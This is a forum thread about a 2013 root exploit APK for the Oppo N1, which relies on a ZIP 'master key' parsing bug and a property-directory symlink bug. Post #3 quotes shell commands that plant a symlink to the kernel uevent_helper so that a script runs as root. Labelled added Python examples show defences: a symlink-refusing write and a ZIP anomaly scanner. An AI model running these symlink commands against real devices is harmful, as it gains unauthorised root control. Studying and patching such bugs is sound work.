APK root exploit

23rd November 2013, 06:25 PM   |  #1  
jcase (OP, Forum Moderator / Senior Recognized Developer)
I tweeted this a couple weeks ago before the N1 was publicly out but here you go, nothing fancy, no real UI or output.

Thanks to Saurik and Giantpune for contributing (i.e. it's based on their research)

Install apk, run apk, wait 1 minute, install SuperSU app from market, then uninstall with this command:

adb uninstall com.qualcomm.privinit
Attached file: Oppown-build3.apk (368.9 KB)
24th November 2013, 12:15 AM   |  #2  
Mr_Bartek (Senior Member)
Do you have a link to their research or are their findings private?

Regards,
24th November 2013, 12:41 AM   |  #3  
jcase
Quote:
Originally Posted by Mr_Bartek

Do you have a link to their research or are their findings private?

Regards,

saurik - his analysis of the "second master key vuln"

giantpune for his symlink attack vuln in property space:

Code:
/system/bin/mv /data/property /data/backupprop
/system/bin/mkdir /data/property
/system/bin/ln -s /sys/kernel/uevent_helper /data/property/.temp
/system/bin/setprop persist.sys.fail /data/pwn.sh
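Added example, not part of jcase's post and not giantpune's code: the defensive side of the symlink issue above, showing a write that follows a planted `.temp` link next to one that refuses it. It assumes the service stages each persistent value in a `.temp` file inside its storage directory, as the link name in the commands suggests; the directory layout and function names are constructed for the demo.

```python
import errno
import os
import tempfile

def write_following_links(directory, value):
    """Naive scratch-file write: open() follows a symlink planted at .temp."""
    fd = os.open(os.path.join(directory, ".temp"),
                 os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(value)

def write_refusing_links(directory, value):
    """Hardened write: O_NOFOLLOW fails the open if .temp is a symlink.
    It only guards the final path component, so the directory itself must
    also be owned and writable only by the service."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | os.O_NOFOLLOW
    try:
        fd = os.open(os.path.join(directory, ".temp"), flags, 0o600)
    except OSError as e:
        if e.errno in (errno.ELOOP, errno.EMLINK):   # Linux / BSD
            return False
        raise
    with os.fdopen(fd, "w") as f:
        f.write(value)
    return True

def read(path):
    with open(path) as f:
        return f.read()

def demo():
    """Constructed scenario in a throwaway directory.
    Returns (naive_write_was_redirected, hardened_write_was_blocked)."""
    with tempfile.TemporaryDirectory() as root:
        store = os.path.join(root, "property")       # stand-in directory
        target = os.path.join(root, "other-file")    # file outside the store
        os.mkdir(store)
        with open(target, "w") as f:
            f.write("original")
        os.symlink(target, os.path.join(store, ".temp"))
        write_following_links(store, "new-value")
        redirected = read(target) == "new-value"
        with open(target, "w") as f:
            f.write("original")
        accepted = write_refusing_links(store, "new-value")
        blocked = not accepted and read(target) == "original"
        return redirected, blocked
```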
24th November 2013, 03:00 AM   |  #4  
Senior Member
Quote:
Originally Posted by jcase

I tweeted this a couple weeks ago before the N1 was publicly out but here you go, nothing fancy, no real UI or output.

Thanks to Saurik and Giantpune for contributing (i.e. it's based on their research)

Install apk, run apk, wait 1 minute, install SuperSU app from market, then uninstall with this command:

adb uninstall com.qualcomm.privinit

Will this exploit work on any other device? When I try to install, the Play Store warns about the vulnerability. Will this vulnerability be gone after uninstalling oppoown?
24th November 2013, 03:08 AM   |  #5  
jcase
Quote:
Originally Posted by coolrevi

Will this exploit work on any other device? When I try to install, the Play Store warns about the vulnerability. Will this vulnerability be gone after uninstalling oppoown?

Possibly other Oppo devices

No, it doesn't fix the vuln, just be careful where you install apps from
24th November 2013, 10:27 AM   |  #6  
Ricky Divjakovski (Recognized Contributor)
Quote:
Originally Posted by jcase

Possibly other Oppo devices

No, it doesn't fix the vuln, just be careful where you install apps from

A second master key vulnerability? Hmm, so this might not be patched in 4.4?
Great job by the way, I don't have the device but this is interesting!
24th November 2013, 11:40 AM   |  #7  
Quote:
Originally Posted by ricky310711

A second master key vulnerability? Hmm, so this might not be patched in 4.4?
Great job by the way, I don't have the device but this is interesting!

It should be patched in 4.4.

But some (read most) OEMs still can't manage to patch their devices up to the latest security updates on release.

Anyway, I tested this root method a week or so ago and it works nicely
24th November 2013, 12:02 PM   |  #8  
Ricky Divjakovski (Recognized Contributor)
Quote:
Originally Posted by pulser_g2

It should be patched in 4.4.

But some (read most) OEMs still can't manage to patch their devices up to the latest security updates on release.

Anyway, I tested this root method a week or so ago and it works nicely

So you're saying in most devices the master key patch could be a possible vulnerability still in 4.3?

interesting...
24th November 2013, 05:17 PM   |  #9  
jcase
Quote:
Originally Posted by ricky310711

So you're saying in most devices the master key patch could be a possible vulnerability still in 4.3?

interesting...

It depends on if OEMs backported it, depends on which build OEMs used and depends on the bug. Four or five different zip parser bugs with similar results. This one I used was patched in 4.3, but others exist.
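Added example, not part of any post in this thread and not the code of anyone named in it: a structural check for the kind of ZIP anomalies that let two parsers disagree about an APK's contents, which is the class of bug discussed above. The three heuristics (repeated entry names, local/central header disagreement, 16-bit lengths that read differently as signed and unsigned) are this example's own choice and are not tied to a specific bug from the thread; the sample archives are constructed.

```python
import io
import struct
import warnings
import zipfile

def scan_apk(data):
    """Return structural findings for a ZIP/APK supplied as bytes."""
    findings, seen = [], set()
    eocd = data.rfind(b"PK\x05\x06")             # end-of-central-directory
    if eocd < 0:
        return ["no end-of-central-directory record"]
    try:
        count, _size, pos = struct.unpack_from("<HII", data, eocd + 10)
        for _ in range(count):
            if data[pos:pos + 4] != b"PK\x01\x02":
                findings.append("central directory corrupt")
                break
            nlen, elen, clen = struct.unpack_from("<HHH", data, pos + 28)
            (local_off,) = struct.unpack_from("<I", data, pos + 42)
            name = data[pos + 46:pos + 46 + nlen]
            label = name.decode("utf-8", "replace")
            if name in seen:                     # two entries share one name
                findings.append(f"duplicate entry name: {label}")
            seen.add(name)
            if data[local_off:local_off + 4] != b"PK\x03\x04":
                findings.append(f"bad local header offset: {label}")
            else:
                l_nlen, l_elen = struct.unpack_from("<HH", data, local_off + 26)
                if data[local_off + 30:local_off + 30 + l_nlen] != name:
                    findings.append(f"local/central name mismatch: {label}")
                if max(l_nlen, l_elen, nlen, elen) >= 0x8000:
                    findings.append(f"length with high bit set: {label}")
            pos += 46 + nlen + elen + clen
    except struct.error:                         # header runs past end of file
        findings.append("truncated header")
    return findings

def build_samples():
    """Constructed archives: clean, duplicate name, patched extra length."""
    def make(names):
        buf = io.BytesIO()
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")      # zipfile warns on duplicates
            with zipfile.ZipFile(buf, "w") as z:
                for n in names:
                    z.writestr(n, b"x")
        return buf.getvalue()
    clean = make(["AndroidManifest.xml", "classes.dex"])
    patched = bytearray(clean)
    patched[28:30] = b"\x00\x80"                 # local extra length = 0x8000
    return clean, make(["classes.dex", "classes.dex"]), bytes(patched)
```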
1st January 2014, 02:22 AM   |  #10  
Junior Member
I'm trying to figure out why the Oppown APK will not install on my N1. Every time I try, it just says "App not installed". But on the install screen it says something about being an update to an already installed program. Any clues as to what the issue is? All I've done is update to the latest OTA software, and I'm currently located in Indonesia, if that makes a difference.
